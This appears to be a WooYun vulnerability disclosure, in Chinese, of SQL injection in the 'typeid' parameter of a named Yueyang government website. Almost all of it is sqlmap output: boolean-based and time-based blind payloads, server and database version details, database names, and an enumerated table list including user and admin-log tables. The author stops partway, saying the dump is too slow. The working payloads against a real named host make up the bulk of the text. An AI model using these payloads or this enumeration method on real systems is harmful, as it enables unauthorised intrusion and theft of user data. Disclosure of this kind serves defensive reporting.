WooYun.org

注入点：
http://sfj.yueyang.gov.cn/open.php?typeid=45
对参数typeid过滤不严，导致注入
请出sqlmap
Place: GET
Parameter: typeid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: typeid=45 AND 3461=3461
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: typeid=45 AND SLEEP(5)
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.5
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] test
[*] zkq071
[00:00:18] [INFO] fetching tables for database: 'zkq071'
[00:00:18] [INFO] fetching number of tables for database 'zkq071
[00:00:18] [INFO] resumed: 60
[00:00:18] [INFO] resumed: db_adminlog
[00:00:18] [INFO] resumed: db_ads
[00:00:18] [INFO] resumed: db_announces
[00:00:18] [INFO] resumed: db_attachments
[00:00:18] [INFO] resumed: db_cache1
[00:00:18] [INFO] resumed: db_credits
[00:00:18] [INFO] resumed: db_dirtywords
[00:00:18] [INFO] resumed: db_fans
[00:00:18] [INFO] resumed: db_forums
[00:00:18] [INFO] resumed: db_friends
[00:00:18] [INFO] resumed: db_groups
[00:00:18] [INFO] resumed: db_invite
[00:00:18] [INFO] resumed: db_links
[00:00:18] [INFO] resumed: db_msgs
[00:00:18] [INFO] resumed: db_online
[00:00:18] [INFO] resumed: db_portal_articles
[00:00:18] [INFO] resumed: db_portal_channels
[00:00:18] [INFO] resumed: db_portal_vars
[00:00:18] [INFO] resumed: db_posts
[00:00:18] [INFO] resumed: db_reward
[00:00:18] [INFO] resumed: db_settings
[00:00:18] [INFO] resumed: db_topics
[00:00:18] [INFO] resumed: db_userfield
[00:00:18] [INFO] resumed: db_users
[00:00:18] [INFO] resumed: db_voteitems
[00:00:18] [INFO] resumed: db_votes
[00:00:18] [INFO] resuming partial value: dbs
....................
太慢了，就不一一跑了！